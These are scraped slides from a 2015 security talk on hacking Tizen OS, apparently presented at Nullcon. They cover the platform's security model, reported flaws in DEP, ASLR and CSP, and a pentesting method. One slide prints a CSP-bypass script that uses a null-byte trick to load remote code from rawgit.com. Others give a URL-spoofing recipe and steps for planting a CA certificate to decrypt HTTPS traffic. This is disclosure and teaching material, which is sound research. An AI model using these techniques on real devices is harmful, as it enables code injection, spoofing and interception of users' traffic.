SlideShare a Scribd company logo
1 of 50
Download to read offline
Hacking TIZEN
The OS of Everything
AJIN ABRAHAM | @ajinabraham
whoami
• Application Security Engineer ,Yodlee
• Blogs at opensecurity.in
• Spoken at NULLCON, ClubHack, OWASP
AppSec AsiaPac, BlackHat Europe, Ground
Zero Summit and few others
• Loves to do and learn NEW things.
Disclaimer
• All Images, Logos and Trademark belongs to
their respective owners.
• All vulnerabilities discussed are responsibly
disclosed to Tizen Security community.
• Personal View/Research, doesn’t reflect the
views of my employer.
Agenda
• Hacking Tizen
*Android WebApp vs Tizen WebApp
* Shellshock
* DEP Gone!
* ASLR Broken
* CSP Bypassed
* URL Spoofing/Content Injection
• Pentesting Methodology
* Static Analysis
* Dynamic Analysis
* Network Analysis
• Security Concerns in Tizen
• Conclusion
• What is Tizen
• Why Tizen?
• Types of Tizen Application
• Tizen Architecture
• Tizen Application Structure
• Tizen Security Model
• Sandbox - SMACK – Simple
Mandatory Access Control
• WebKit2 on Tizen
• Quick Comparison
Android vs Tizen vs iOS
TIZEN : The OS of Everything
Tizen –A Linux Foundation Project.
The Concept of IoT (Internet of Things)
Why TIZEN ?
Source: http://ti mesofindia.indiatimes.com/tech/tech-news/Micromax-beats-Samsung-becomes-Indias-
No-1-mobile-vendor-Report/articleshow/39630245.cms
Source: http://www.theverge.com/2013/11/12/5093588/tizen-open-operating-system-partners-with-
36-companies
History/Family
Types of Tizen Applications
+
Native
Web
Hybrid
NATIVE
NATIVE
+
WEB API
+
WEB API
Tizen Architecture
Tizen Web Framework
(HTML5 + Tizen Web API)
Tizen Native Framework
(C++ API)
FrameworkCoreKernel
Linux Kernel & Drivers
Tizen Web App .wgt Tizen Native App .tpk
Web API = Standard HTML5 + Tizen Device API
Tizen Application Structure
• Native Apps
• Web Apps
• Hybrid Apps
Install Directory
Native App (.tpk)
Install Location
.tpk
Web App (.wgt)
Hybrid App (.wgt)
Tizen Security Model
• Non root applications
• All applications run under same non-root user ID app
• Most of the middleware daemons will run as
non-root user.
• Application sandboxing
• All applications are sandboxed by SMACK.
• Each application unable to send IPC and
sockets, r/w other application files.
• Permission Model/Least privilege
• All applications will have manifest file describing privileges.
• Manifest file describes SMACK labels and rule of the application to
get proper privileges
• Tizen CSP for Web Apps
• Encrypt HTML, JS and CSS stored in Device - Encrypts at Install time and
Runtime decryption.
• Content Security Framework by McAfee – Provides API for AVs.
SMACK : Simple Mandatory Access Control Kernel
Web app 1 Native App (uid: app)
Native Framework
Kernel
Web Runtime (uid:
app)
Some
Daemon
(uid:root)
SMACK
LABEL
Web
app 2
Web1 Web2 Native1 Daemon
File System
Web1 Web2 Native 1
Basic Rule : “what's mine is mine; what's yours is yours.”
SMACK allows you to add controlled exception to this basic rule.
SMACK : Simple Mandatory Access Control Kernel
SMACK Terms:
– Subject  Any Running Process (Have Smack Label)
– Object  File, IPC, Sockets, Process
– Access  Read (r), Write (w), Execute (e), Append (a) , Lock (l), Transmute (t)
-- Label
• Just valid ASCII characters with no meaning, “security tag” applied to
subjects (i.e., processes) and objects (i.e., filesystem objects, sockets,
processes). The label of a running process is called it’s Context.
41,000 SMACK Rules in Tizen 2.2.1 !!
From Tizen 3.X: ( Smack Three domain Model, Cynara)
https://wiki.tizen.org/wiki/Security:Cynara
Native Apps – manifest.xml
Web Apps – config.xml
WebKit2 on Tizen
• Tizen WebApps runs on WebKit2
• New API Layer over WebKit
• Supports Split Process Model, Like your Chrome Tabs
Quick Comparison
Tizen
• Users identified by UID (app)
• Permission: Manifest.xml & Config.xml
• MessagePort IPC using socket
• SMACK & CSP
• Content Security Framework
• Signed by Developer & Distributor
Android
• Apps identified by UID
• Permission : AndroidManifest.xml
• Binder IPC using Intents
• SELinux
• Signed by Developer
iOS
• All Apps run under user “mobile”.
• No permission model. Ask for Permission at Runtime.
• Mach Ports/ Distributed Notifications/ Distributed Objects/
AppleEvents & AppleScript/Pasteboard/XPC based IPC
• Powerbox, Seatbelt
• Signed by Distributor
Enough! Let’s Hack Tizen
Research Focus
• Tizen WebApps
• Tizen OS Memory Protection
• Tizen CSP and WebKit
Android Web App vs Tizen Web App
• Tizen Web Apps are powerful and feature rich.
• In Android Web Apps in WebView and can
interact with Device features using
addJavascriptInterface.
• In Tizen, It provides Web API that allows to
leverage Device features and are restricted
using permissions and CSP.
Over privileged: Android Web App vs Tizen Web App
WebView
BLUETOOTH
Android Tizen
WebApp
DEVELOPER EXPOSES API
TO BRIDGE
BLUETOOTH PERMISSION
ADDJAVASCRIPTINTERFACE
NFC
BLUETOOTH PRIVILEGE NFC PRIVILEGENFC PERMISSION
NFCBLUETOOTH
BLUETOOTH API NFC API
Android Web App vs Tizen Web App
WebView
BLUETOOTH
Android Tizen
WebApp
DEVELOPER EXPOSES API
TO BRIDGE
BLUETOOTH PERMISSION
ADDJAVASCRIPTINTERFACE
NFC
BLUETOOTH PRIVILEGE NFC PRIVILEGENFC PERMISSION
NFCBLUETOOTH
XSS XSS
CSP
BLUETOOTH API NFC API
Shellshock!
DEP – Gone!
• When Data Execution Prevention is enabled.
data on stack should be non-executable.
• Prevents Shellcode at Stack from Executing.
• But DEP is not seen in action.
DEMO
• As per documentation ASLR is fully implemented in Tizen 2.1 itself.
• Already Broken in Tizen 2.2.1 , discovered by Shuichiro Suzuki
• /proc/sys/kernel/randomize_va_space is set to 2 which tell us that ASLR is enabled.
• But as the personality value of /proc/self/personality is set to 00040000. which
corresponds to (ADDR_NO_RANDOMIZE) disables ASLR.
• Issue is patched in Tizen 2.2 by setting /proc/self/personality to 00000000
• PIE (position-independent executable). So this will make all the native application
ASLR enabled by default.
• But due to implementation issues, it was still found that ASLR is still in broken state.
• /proc/<pid>/maps –Address of heap, stack and main modules remain the same.
ASLR Broken!
DEMO
ASLR Broken!
URL Address Spoofing/Content Injection
• Open a new window with URL
https://facebook.com and assign it to a variable w.
• Try to write “<h1>You 've been Hacked</h1>” to DOM
using w.document.write()
• Focus the window corresponding to w.
DEMO
CSP Bypass
<script>
a=document.createElement('script');
a.id='x';
a.src='u0000https://rawgit.com/ajinabraham/PoC/master/script.js';
document.body.appendChild(a);
</script>
Content-Security-Policy: default-src 'self’; script-src 'self’ ‘unsafe-inline’;
• We create a script tag with JavaScript nullbyte prepended to a
SCRIPT URL.
• Tricks the browser and load the Script from a different domain and
Bypass CSP.
DEMO
Pentesting Methodology
• Whitebox: Access to Source and Knowledge
about the application
• Blackbox: No access to Source and no idea
about the application
• Static Analysis
• Dynamic Analysis
• Network Analysis
Static Analysis
• Certificate Signature Analysis – Developer and Distributor
• Manifest Analysis – manifest.xml/config.xml
• Unwanted Privileges.
• CSP is proper or not.
• Smack Labels and Rules
• Directories/ Files/DB with chmod 777 access.
• Code Review
• Weak Encryption, Crypto
• Plaintext Information
• SSL Overriding
• Writing to SD Card / External Storage – World Readable
• Sqlite is used so Client Side SQLi.
Dynamic Analysis
• Run the App in Tizen VM or Web Simulator
• Sensitive data shared during IPC, Sensitive files
written at Runtime, Temp files etc.
• Tools: Dynamic Analyzer much like android
ddms/Android Device Monitor, sdb – The adb
equivalent for Tizen.
Network Analysis
• Installing SSL Certificate and HTTPS Traffic
Decryption with a Proxy like Burp or Fiddler
• OWASP Top 10 Web Risks
• XSS + Improper CSP = JavaScript can directly
access device functionalities provided
permissions are there.
Installing CA Certificate for HTTPS Traffic Decryption
• Trusted CA Certificates are stored under /etc/ssl/certs
• Filename: <8HEXChars.0> in PEM format.
• Copy the CA certificate to /etc/ssl/certs and it’s trusted.
Security Concerns
• WebKit = Bugs!!
•
WebKit is basically a collection of use-after-frees that
somehow manages to render HTML (probably via a
buffer overflow in WebGL) -the grugq
• HTML Web API is there, Improper CSP and
XSS=owned !!
• Too much SMACK Rules – High chance that developers
will mess up. Will be reduced from Tizen 3.
Conclusion
• Security Model/Architecture wise they put lot
of effort compared to Android or other devices
out their.
• They made it so complex that people can
easily mess up
• Looks promising if they can fix similar
implementation bugs like this.
Thanks!
Thanks to my awesome manager Sachin, for
all the support and encouragement to carry
out this research.
@ajinabraham

More Related Content

What's hot

AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAjin Abraham
 
DevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless SecurityDevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless SecurityAvi Shulman
 
CNIT 128 7. Attacking Android Applications (Part 2)
CNIT 128 7. Attacking Android Applications (Part 2)CNIT 128 7. Attacking Android Applications (Part 2)
CNIT 128 7. Attacking Android Applications (Part 2)Sam Bowne
 
CNIT 128 2. Analyzing iOS Applications (Part 2)
CNIT 128 2. Analyzing iOS Applications (Part 2)CNIT 128 2. Analyzing iOS Applications (Part 2)
CNIT 128 2. Analyzing iOS Applications (Part 2)Sam Bowne
 
Abusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox AddonsAbusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox AddonsAjin Abraham
 
[Wroclaw #2] iOS Security - 101
[Wroclaw #2] iOS Security - 101[Wroclaw #2] iOS Security - 101
[Wroclaw #2] iOS Security - 101OWASP
 
API Security and Management Best Practices
API Security and Management Best PracticesAPI Security and Management Best Practices
API Security and Management Best PracticesCA API Management
 
CNIT 128 6. Analyzing Android Applications (Part 1)
CNIT 128 6. Analyzing Android Applications (Part 1)CNIT 128 6. Analyzing Android Applications (Part 1)
CNIT 128 6. Analyzing Android Applications (Part 1)Sam Bowne
 
Serverless - minimizing the attack surface
Serverless - minimizing the attack surfaceServerless - minimizing the attack surface
Serverless - minimizing the attack surfaceAvi Shulman
 
CNIT 128 8. Identifying and Exploiting Android Implementation Issues (Part 2)
CNIT 128 8. Identifying and Exploiting Android Implementation Issues (Part 2)CNIT 128 8. Identifying and Exploiting Android Implementation Issues (Part 2)
CNIT 128 8. Identifying and Exploiting Android Implementation Issues (Part 2)Sam Bowne
 
Android pen test basics
Android pen test basicsAndroid pen test basics
Android pen test basicsOWASPKerala
 
CNIT 128 8. Identifying and Exploiting Android Implementation Issues (Part 3)
CNIT 128 8. Identifying and Exploiting Android Implementation Issues (Part 3)CNIT 128 8. Identifying and Exploiting Android Implementation Issues (Part 3)
CNIT 128 8. Identifying and Exploiting Android Implementation Issues (Part 3)Sam Bowne
 
2015.04.24 Updated > Android Security Development - Part 1: App Development
2015.04.24 Updated > Android Security Development - Part 1: App Development 2015.04.24 Updated > Android Security Development - Part 1: App Development
2015.04.24 Updated > Android Security Development - Part 1: App Development Cheng-Yi Yu
 
[Wroclaw #4] WebRTC & security: 101
[Wroclaw #4] WebRTC & security: 101[Wroclaw #4] WebRTC & security: 101
[Wroclaw #4] WebRTC & security: 101OWASP
 
Security in Serverless world
Security in Serverless worldSecurity in Serverless world
Security in Serverless worldYan Cui
 
CyberArk Impact 2017 - REST for the Rest of Us
CyberArk Impact 2017 - REST for the Rest of UsCyberArk Impact 2017 - REST for the Rest of Us
CyberArk Impact 2017 - REST for the Rest of UsJoe Garcia
 
API Security in a Microservices World
API Security in a Microservices WorldAPI Security in a Microservices World
API Security in a Microservices World42Crunch
 
Pentesting Mobile Applications (Prashant Verma)
Pentesting Mobile Applications (Prashant Verma)Pentesting Mobile Applications (Prashant Verma)
Pentesting Mobile Applications (Prashant Verma)ClubHack
 
CNIT 128 2. Analyzing iOS Applications (Part 1)
CNIT 128 2. Analyzing iOS Applications (Part 1)CNIT 128 2. Analyzing iOS Applications (Part 1)
CNIT 128 2. Analyzing iOS Applications (Part 1)Sam Bowne
 

What's hot (20)

AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
 
DevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless SecurityDevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless Security
 
CNIT 128 7. Attacking Android Applications (Part 2)
CNIT 128 7. Attacking Android Applications (Part 2)CNIT 128 7. Attacking Android Applications (Part 2)
CNIT 128 7. Attacking Android Applications (Part 2)
 
CNIT 128 2. Analyzing iOS Applications (Part 2)
CNIT 128 2. Analyzing iOS Applications (Part 2)CNIT 128 2. Analyzing iOS Applications (Part 2)
CNIT 128 2. Analyzing iOS Applications (Part 2)
 
Abusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox AddonsAbusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox Addons
 
[Wroclaw #2] iOS Security - 101
[Wroclaw #2] iOS Security - 101[Wroclaw #2] iOS Security - 101
[Wroclaw #2] iOS Security - 101
 
API Security and Management Best Practices
API Security and Management Best PracticesAPI Security and Management Best Practices
API Security and Management Best Practices
 
CNIT 128 6. Analyzing Android Applications (Part 1)
CNIT 128 6. Analyzing Android Applications (Part 1)CNIT 128 6. Analyzing Android Applications (Part 1)
CNIT 128 6. Analyzing Android Applications (Part 1)
 
Serverless - minimizing the attack surface
Serverless - minimizing the attack surfaceServerless - minimizing the attack surface
Serverless - minimizing the attack surface
 
CNIT 128 8. Identifying and Exploiting Android Implementation Issues (Part 2)
CNIT 128 8. Identifying and Exploiting Android Implementation Issues (Part 2)CNIT 128 8. Identifying and Exploiting Android Implementation Issues (Part 2)
CNIT 128 8. Identifying and Exploiting Android Implementation Issues (Part 2)
 
Android pen test basics
Android pen test basicsAndroid pen test basics
Android pen test basics
 
CNIT 128 8. Identifying and Exploiting Android Implementation Issues (Part 3)
CNIT 128 8. Identifying and Exploiting Android Implementation Issues (Part 3)CNIT 128 8. Identifying and Exploiting Android Implementation Issues (Part 3)
CNIT 128 8. Identifying and Exploiting Android Implementation Issues (Part 3)
 
2015.04.24 Updated > Android Security Development - Part 1: App Development
2015.04.24 Updated > Android Security Development - Part 1: App Development 2015.04.24 Updated > Android Security Development - Part 1: App Development
2015.04.24 Updated > Android Security Development - Part 1: App Development
 
[Wroclaw #4] WebRTC & security: 101
[Wroclaw #4] WebRTC & security: 101[Wroclaw #4] WebRTC & security: 101
[Wroclaw #4] WebRTC & security: 101
 
iOS Application Pentesting
iOS Application PentestingiOS Application Pentesting
iOS Application Pentesting
 
Security in Serverless world
Security in Serverless worldSecurity in Serverless world
Security in Serverless world
 
CyberArk Impact 2017 - REST for the Rest of Us
CyberArk Impact 2017 - REST for the Rest of UsCyberArk Impact 2017 - REST for the Rest of Us
CyberArk Impact 2017 - REST for the Rest of Us
 
API Security in a Microservices World
API Security in a Microservices WorldAPI Security in a Microservices World
API Security in a Microservices World
 
Pentesting Mobile Applications (Prashant Verma)
Pentesting Mobile Applications (Prashant Verma)Pentesting Mobile Applications (Prashant Verma)
Pentesting Mobile Applications (Prashant Verma)
 
CNIT 128 2. Analyzing iOS Applications (Part 1)
CNIT 128 2. Analyzing iOS Applications (Part 1)CNIT 128 2. Analyzing iOS Applications (Part 1)
CNIT 128 2. Analyzing iOS Applications (Part 1)
 

Viewers also liked

NFC on Android - Near Field Communication
NFC on Android - Near Field CommunicationNFC on Android - Near Field Communication
NFC on Android - Near Field CommunicationSven Haiges
 
Embedded Systems Security News Feb 2011
Embedded Systems Security News Feb 2011Embedded Systems Security News Feb 2011
Embedded Systems Security News Feb 2011AurMiana
 
EE Reports Metering 101 Guide: Benefits and Applications of Submetering
EE Reports Metering 101 Guide: Benefits and Applications of SubmeteringEE Reports Metering 101 Guide: Benefits and Applications of Submetering
EE Reports Metering 101 Guide: Benefits and Applications of SubmeteringEEReports.com
 
Contextually Relevant Retail APIs for Dynamic Insights & Experiences
Contextually Relevant Retail APIs for Dynamic Insights & ExperiencesContextually Relevant Retail APIs for Dynamic Insights & Experiences
Contextually Relevant Retail APIs for Dynamic Insights & ExperiencesJason Lobel
 
Is there such a thing as smart retail
Is there such a thing as smart retailIs there such a thing as smart retail
Is there such a thing as smart retailPierre Metivier
 
System Label Company Overview
System Label Company Overview System Label Company Overview
System Label Company Overview System Label
 
Product catalogue europe en_2016
Product catalogue europe en_2016Product catalogue europe en_2016
Product catalogue europe en_2016Ignacio Gonzalez
 
NFC and consumers - Success factors and limitations in retail business - Flor...
NFC and consumers - Success factors and limitations in retail business - Flor...NFC and consumers - Success factors and limitations in retail business - Flor...
NFC and consumers - Success factors and limitations in retail business - Flor...Florian Resatsch
 
NEAR FIELD COMMUNICATION (NFC)
NEAR FIELD COMMUNICATION (NFC) NEAR FIELD COMMUNICATION (NFC)
NEAR FIELD COMMUNICATION (NFC) ADITYA GUPTA
 
Recruter, Fidéliser dans vos magasins avec les technologies disruptives, iBea...
Recruter, Fidéliser dans vos magasins avec les technologies disruptives, iBea...Recruter, Fidéliser dans vos magasins avec les technologies disruptives, iBea...
Recruter, Fidéliser dans vos magasins avec les technologies disruptives, iBea...servicesmobiles.fr
 
Track 1 session 6 - st dev con 2016 - smart badge
Track 1   session 6 - st dev con 2016 - smart badgeTrack 1   session 6 - st dev con 2016 - smart badge
Track 1 session 6 - st dev con 2016 - smart badgeST_World
 
CONNECTED OBJECTS - how NFC technology enables a more environmentally-friendl...
CONNECTED OBJECTS - how NFC technology enables a more environmentally-friendl...CONNECTED OBJECTS - how NFC technology enables a more environmentally-friendl...
CONNECTED OBJECTS - how NFC technology enables a more environmentally-friendl...Pierre Metivier
 
A Librarian's Field Guide to Near Field Communication
A Librarian's Field Guide to Near Field CommunicationA Librarian's Field Guide to Near Field Communication
A Librarian's Field Guide to Near Field CommunicationKristen Yarmey
 
NFC Development with Qt - v2.2.0 (5. November 2012)
NFC Development with Qt - v2.2.0 (5. November 2012)NFC Development with Qt - v2.2.0 (5. November 2012)
NFC Development with Qt - v2.2.0 (5. November 2012)Andreas Jakl
 
Near field communication(NFC)
Near field communication(NFC)Near field communication(NFC)
Near field communication(NFC)ronak1207
 
On Relaying NFC Payment Transactions using Android devices
On Relaying NFC Payment Transactions using Android devicesOn Relaying NFC Payment Transactions using Android devices
On Relaying NFC Payment Transactions using Android devicescgvwzq
 
Near field communication (nfc) technology
Near field communication (nfc) technologyNear field communication (nfc) technology
Near field communication (nfc) technologyAnkur Sharma
 
NEAR FIELD COMMUNICATION
NEAR FIELD COMMUNICATIONNEAR FIELD COMMUNICATION
NEAR FIELD COMMUNICATIONHarisankar U K
 

Viewers also liked (20)

NFC on Android - Near Field Communication
NFC on Android - Near Field CommunicationNFC on Android - Near Field Communication
NFC on Android - Near Field Communication
 
Thinaire deck redux
Thinaire deck reduxThinaire deck redux
Thinaire deck redux
 
Embedded Systems Security News Feb 2011
Embedded Systems Security News Feb 2011Embedded Systems Security News Feb 2011
Embedded Systems Security News Feb 2011
 
EE Reports Metering 101 Guide: Benefits and Applications of Submetering
EE Reports Metering 101 Guide: Benefits and Applications of SubmeteringEE Reports Metering 101 Guide: Benefits and Applications of Submetering
EE Reports Metering 101 Guide: Benefits and Applications of Submetering
 
Making Waves with NFC 2011
Making Waves with NFC 2011Making Waves with NFC 2011
Making Waves with NFC 2011
 
Contextually Relevant Retail APIs for Dynamic Insights & Experiences
Contextually Relevant Retail APIs for Dynamic Insights & ExperiencesContextually Relevant Retail APIs for Dynamic Insights & Experiences
Contextually Relevant Retail APIs for Dynamic Insights & Experiences
 
Is there such a thing as smart retail
Is there such a thing as smart retailIs there such a thing as smart retail
Is there such a thing as smart retail
 
System Label Company Overview
System Label Company Overview System Label Company Overview
System Label Company Overview
 
Product catalogue europe en_2016
Product catalogue europe en_2016Product catalogue europe en_2016
Product catalogue europe en_2016
 
NFC and consumers - Success factors and limitations in retail business - Flor...
NFC and consumers - Success factors and limitations in retail business - Flor...NFC and consumers - Success factors and limitations in retail business - Flor...
NFC and consumers - Success factors and limitations in retail business - Flor...
 
NEAR FIELD COMMUNICATION (NFC)
NEAR FIELD COMMUNICATION (NFC) NEAR FIELD COMMUNICATION (NFC)
NEAR FIELD COMMUNICATION (NFC)
 
Recruter, Fidéliser dans vos magasins avec les technologies disruptives, iBea...
Recruter, Fidéliser dans vos magasins avec les technologies disruptives, iBea...Recruter, Fidéliser dans vos magasins avec les technologies disruptives, iBea...
Recruter, Fidéliser dans vos magasins avec les technologies disruptives, iBea...
 
Track 1 session 6 - st dev con 2016 - smart badge
Track 1   session 6 - st dev con 2016 - smart badgeTrack 1   session 6 - st dev con 2016 - smart badge
Track 1 session 6 - st dev con 2016 - smart badge
 
CONNECTED OBJECTS - how NFC technology enables a more environmentally-friendl...
CONNECTED OBJECTS - how NFC technology enables a more environmentally-friendl...CONNECTED OBJECTS - how NFC technology enables a more environmentally-friendl...
CONNECTED OBJECTS - how NFC technology enables a more environmentally-friendl...
 
A Librarian's Field Guide to Near Field Communication
A Librarian's Field Guide to Near Field CommunicationA Librarian's Field Guide to Near Field Communication
A Librarian's Field Guide to Near Field Communication
 
NFC Development with Qt - v2.2.0 (5. November 2012)
NFC Development with Qt - v2.2.0 (5. November 2012)NFC Development with Qt - v2.2.0 (5. November 2012)
NFC Development with Qt - v2.2.0 (5. November 2012)
 
Near field communication(NFC)
Near field communication(NFC)Near field communication(NFC)
Near field communication(NFC)
 
On Relaying NFC Payment Transactions using Android devices
On Relaying NFC Payment Transactions using Android devicesOn Relaying NFC Payment Transactions using Android devices
On Relaying NFC Payment Transactions using Android devices
 
Near field communication (nfc) technology
Near field communication (nfc) technologyNear field communication (nfc) technology
Near field communication (nfc) technology
 
NEAR FIELD COMMUNICATION
NEAR FIELD COMMUNICATIONNEAR FIELD COMMUNICATION
NEAR FIELD COMMUNICATION
 

Similar to Hacking Tizen : The OS of Everything - Nullcon Goa 2015

iOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for BeginnersiOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for BeginnersRyanISI
 
DCSF19 Container Security: Theory & Practice at Netflix
DCSF19 Container Security: Theory & Practice at NetflixDCSF19 Container Security: Theory & Practice at Netflix
DCSF19 Container Security: Theory & Practice at NetflixDocker, Inc.
 
CactusCon - Practical iOS App Attack and Defense
CactusCon - Practical iOS App Attack and DefenseCactusCon - Practical iOS App Attack and Defense
CactusCon - Practical iOS App Attack and DefenseSeth Law
 
iOS application (in)security
iOS application (in)securityiOS application (in)security
iOS application (in)securityiphonepentest
 
Thick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseThick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseNetSPI
 
Evaluating iOS Applications
Evaluating iOS ApplicationsEvaluating iOS Applications
Evaluating iOS Applicationsiphonepentest
 
CodeMash 2.0.1.5 - Practical iOS App Attack & Defense
CodeMash 2.0.1.5 - Practical iOS App Attack & DefenseCodeMash 2.0.1.5 - Practical iOS App Attack & Defense
CodeMash 2.0.1.5 - Practical iOS App Attack & DefenseSeth Law
 
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...Felipe Prado
 
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...PaloAltoNetworks
 
Application Streaming is dead. A smart way to choose an alternative
Application Streaming is dead. A smart way to choose an alternativeApplication Streaming is dead. A smart way to choose an alternative
Application Streaming is dead. A smart way to choose an alternativeDenis Gundarev
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseScott Sutherland
 
Thick Client Penetration Testing.pdf
Thick Client Penetration Testing.pdfThick Client Penetration Testing.pdf
Thick Client Penetration Testing.pdfSouvikRoy114738
 
Rapid Android Application Security Testing
Rapid Android Application Security TestingRapid Android Application Security Testing
Rapid Android Application Security TestingNutan Kumar Panda
 
Introduction to Android Development and Security
Introduction to Android Development and SecurityIntroduction to Android Development and Security
Introduction to Android Development and SecurityKelwin Yang
 
Top 10 Threats to Cloud Security
Top 10 Threats to Cloud SecurityTop 10 Threats to Cloud Security
Top 10 Threats to Cloud SecuritySBWebinars
 
Security research over Windows #defcon china
Security research over Windows #defcon chinaSecurity research over Windows #defcon china
Security research over Windows #defcon chinaPeter Hlavaty
 
Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014Akash Mahajan
 
Patterns and Pains of Migrating Legacy Applications to Kubernetes
Patterns and Pains of Migrating Legacy Applications to KubernetesPatterns and Pains of Migrating Legacy Applications to Kubernetes
Patterns and Pains of Migrating Legacy Applications to KubernetesJosef Adersberger
 

Similar to Hacking Tizen : The OS of Everything - Nullcon Goa 2015 (20)

iOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for BeginnersiOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for Beginners
 
DCSF19 Container Security: Theory & Practice at Netflix
DCSF19 Container Security: Theory & Practice at NetflixDCSF19 Container Security: Theory & Practice at Netflix
DCSF19 Container Security: Theory & Practice at Netflix
 
CactusCon - Practical iOS App Attack and Defense
CactusCon - Practical iOS App Attack and DefenseCactusCon - Practical iOS App Attack and Defense
CactusCon - Practical iOS App Attack and Defense
 
iOS application (in)security
iOS application (in)securityiOS application (in)security
iOS application (in)security
 
Thick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseThick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash Course
 
Evaluating iOS Applications
Evaluating iOS ApplicationsEvaluating iOS Applications
Evaluating iOS Applications
 
CodeMash 2.0.1.5 - Practical iOS App Attack & Defense
CodeMash 2.0.1.5 - Practical iOS App Attack & DefenseCodeMash 2.0.1.5 - Practical iOS App Attack & Defense
CodeMash 2.0.1.5 - Practical iOS App Attack & Defense
 
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
 
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
 
Application Streaming is dead. A smart way to choose an alternative
Application Streaming is dead. A smart way to choose an alternativeApplication Streaming is dead. A smart way to choose an alternative
Application Streaming is dead. A smart way to choose an alternative
 
iOS Application Exploitation
iOS Application ExploitationiOS Application Exploitation
iOS Application Exploitation
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
Thick Client Penetration Testing.pdf
Thick Client Penetration Testing.pdfThick Client Penetration Testing.pdf
Thick Client Penetration Testing.pdf
 
Rapid Android Application Security Testing
Rapid Android Application Security TestingRapid Android Application Security Testing
Rapid Android Application Security Testing
 
Introduction to Android Development and Security
Introduction to Android Development and SecurityIntroduction to Android Development and Security
Introduction to Android Development and Security
 
Top 10 Threats to Cloud Security
Top 10 Threats to Cloud SecurityTop 10 Threats to Cloud Security
Top 10 Threats to Cloud Security
 
Security research over Windows #defcon china
Security research over Windows #defcon chinaSecurity research over Windows #defcon china
Security research over Windows #defcon china
 
Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014
 
Hacking mobile apps
Hacking mobile appsHacking mobile apps
Hacking mobile apps
 
Patterns and Pains of Migrating Legacy Applications to Kubernetes
Patterns and Pains of Migrating Legacy Applications to KubernetesPatterns and Pains of Migrating Legacy Applications to Kubernetes
Patterns and Pains of Migrating Legacy Applications to Kubernetes
 

More from Ajin Abraham

Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...Ajin Abraham
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsAjin Abraham
 
Abusing Google Apps and Data API: Google is My Command and Control Center
Abusing Google Apps and Data API: Google is My Command and Control CenterAbusing Google Apps and Data API: Google is My Command and Control Center
Abusing Google Apps and Data API: Google is My Command and Control CenterAjin Abraham
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
 
Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...
Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...
